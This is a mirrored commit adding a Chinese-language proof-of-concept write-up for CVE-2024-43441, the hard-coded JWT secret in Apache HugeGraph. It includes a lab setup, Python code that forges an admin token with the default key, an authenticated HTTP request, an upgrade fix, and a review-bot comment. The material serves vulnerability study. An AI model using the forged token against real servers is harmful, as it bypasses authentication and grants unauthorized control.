Mirror of https://github.com/Threekiii/Awesome-POC.git (synced 2025-11-05 10:50:23 +00:00)

Commit ae49bd83fb (parent 0f6b3700ad): update CVE-2024-43441
@ -875,6 +875,7 @@
|
|||||||
* Apache Druid 远程代码执行漏洞 CVE-2021-25646
|
* Apache Druid 远程代码执行漏洞 CVE-2021-25646
|
||||||
* Apache Druid 远程代码执行漏洞 CVE-2021-26919
|
* Apache Druid 远程代码执行漏洞 CVE-2021-26919
|
||||||
* Apache Druid 远程代码执行漏洞 QVD-2023-9629
|
* Apache Druid 远程代码执行漏洞 QVD-2023-9629
|
||||||
|
* Apache HugeGraph JWT Token 密钥硬编码漏洞 CVE-2024-43441
|
||||||
* Apache HugeGraph 远程代码执行漏洞 CVE-2024-27348
|
* Apache HugeGraph 远程代码执行漏洞 CVE-2024-27348
|
||||||
* ClickHouse API 数据库接口未授权访问漏洞
|
* ClickHouse API 数据库接口未授权访问漏洞
|
||||||
* ElasticSearch Groovy 沙盒绕过 & 代码执行漏洞 CVE-2015-1427
|
* ElasticSearch Groovy 沙盒绕过 & 代码执行漏洞 CVE-2015-1427
|
||||||
|
|||||||
New file (89 lines): 数据库漏洞/Apache HugeGraph JWT Token 密钥硬编码漏洞 CVE-2024-43441.md
@ -0,0 +1,89 @@
|
|||||||
|
# Apache HugeGraph JWT Token 密钥硬编码漏洞 CVE-2024-43441
|
||||||
|
|
||||||
|
## 漏洞描述
|
||||||
|
|
||||||
|
Apache HugeGraph 是一款快速、高度可扩展的图数据库。它提供了完整的图数据库功能,具有出色的性能和企业级的可靠性。
|
||||||
|
|
||||||
|
Apache HugeGraph 存在一个 JWT token 密钥硬编码漏洞。当启用了认证但未配置 auth.token_secret 时,HugeGraph 将使用一个硬编码的默认 JWT 密钥,其值为 FXQXbJtbCLxODc6tGci732pkH1cyf8Qg。攻击者可以使用这个默认密钥生成有效的 JWT token,从而绕过认证执行未经授权的操作。
|
||||||
|
|
||||||
|
参考链接:
|
||||||
|
|
||||||
|
- https://github.com/advisories/GHSA-f697-gm3h-xrf9
|
||||||
|
- https://github.com/apache/incubator-hugegraph/commit/03b40a52446218c83e98cb43020e0593a744a246
|
||||||
|
|
||||||
|
## 漏洞影响
|
||||||
|
|
||||||
|
```
|
||||||
|
1.0.0 <= HugeGraph < 1.5.0
|
||||||
|
```
|
||||||
|
|
||||||
|
## 环境搭建
|
||||||
|
|
||||||
|
Vulhub 执行如下命令启动 Apache HugeGraph 1.3.0 服务器:
|
||||||
|
|
||||||
|
```
|
||||||
|
docker compose up -d
|
||||||
|
```
|
||||||
|
|
||||||
|
服务启动后,可以通过 `http://your-ip:8080` 访问 HugeGraph 的 RESTful API。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
默认情况下,Apache HugeGraph 支持两种认证模式:HTTP 基础认证和 JWT 认证。当启动 docker 容器时,系统会使用环境变量 PASSWORD 中指定的值作为默认管理员的密码。在正常情况下,您可以使用用户名 "admin" 和该密码通过 HTTP 基础认证访问 API。
|
||||||
|
|
||||||
|
如果您尝试在不提供任何认证头的情况下访问 API,将会收到如下错误:
|
||||||
|
|
||||||
|
```json
|
||||||
|
{
|
||||||
|
"exception": "class jakarta.ws.rs.NotAuthorizedException",
|
||||||
|
"message": "Authentication credentials are required",
|
||||||
|
"cause": ""
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
## 漏洞复现
|
||||||
|
|
||||||
|
除了默认管理员密码外,我们还可以使用默认 JWT 密钥生成有效的 JWT token 绕过认证。
|
||||||
|
|
||||||
|
生成一个使用默认密钥的 JWT token:
|
||||||
|
|
||||||
|
```python
|
||||||
|
# 安装 jwt 库,运行 `pip install pyjwt`
|
||||||
|
import jwt
|
||||||
|
|
||||||
|
# 使用默认密钥生成 JWT token
|
||||||
|
token = jwt.encode(
|
||||||
|
{
|
||||||
|
"user_name": "admin",
|
||||||
|
"user_id": "-30:admin",
|
||||||
|
"exp": 9739523483
|
||||||
|
},
|
||||||
|
"FXQXbJtbCLxODc6tGci732pkH1cyf8Qg",
|
||||||
|
algorithm="HS256"
|
||||||
|
)
|
||||||
|
print(f"Generated JWT token: {token}")
|
||||||
|
# Output:
|
||||||
|
# Generated JWT token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX25hbWUiOiJhZG1pbiIsInVzZXJfaWQiOiItMzA6YWRtaW4iLCJleHAiOjk3Mzk1MjM0ODN9.eZxB0qIsVEtRuOMwXbOhENwS-OoY0miStHOQlBdJXt8
|
||||||
|
```
|
||||||
|
|
||||||
|
使用生成的 JWT token 访问受保护的端点:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: your-ip:8080
|
||||||
|
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX25hbWUiOiJhZG1pbiIsInVzZXJfaWQiOiItMzA6YWRtaW4iLCJleHAiOjk3Mzk1MjM0ODN9.eZxB0qIsVEtRuOMwXbOhENwS-OoY0miStHOQlBdJXt8
|
||||||
|
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
|
||||||
|
Accept: */*
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
也可以通过 [jwt.io](https://jwt.io/) 等工具生成 JWT token:
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
## 漏洞修复
|
||||||
|
|
||||||
|
升级 Apache HugeGraph-Server 至 1.5.0 及以上版本。
|
||||||
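Review bot: the 漏洞修复 section at the end of the new file stops at "upgrade to 1.5.0", while the 漏洞描述 section says the hard-coded key `FXQXbJtbCLxODc6tGci732pkH1cyf8Qg` is only used when authentication is enabled and `auth.token_secret` is not configured; state the interim mitigation for the listed range `1.0.0 <= HugeGraph < 1.5.0` (set a long random `auth.token_secret` so the default is never reached) and add a post-fix check: replay the PoC token from the 漏洞复现 section and confirm the server now answers with the `NotAuthorizedException` response shown in the 环境搭建 section, because any token signed with the old key stays valid until its `exp` (the PoC uses `9739523483`, decades away) unless the signing secret actually changes. Two smaller points on the PoC: `GET /` proves the bypass but not the privilege level, so a request that requires admin rights would make the screenshot more convincing; and on PyJWT 1.x `jwt.encode` returns bytes, so the printed token would carry a `b'...'` prefix, which the comment `pip install pyjwt` should pin as `pyjwt>=2` to match the shown output.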
Binary file added (not shown), 88 KiB
Binary file added (not shown), 148 KiB
Binary file added (not shown), 282 KiB
Binary file added (not shown), 279 KiB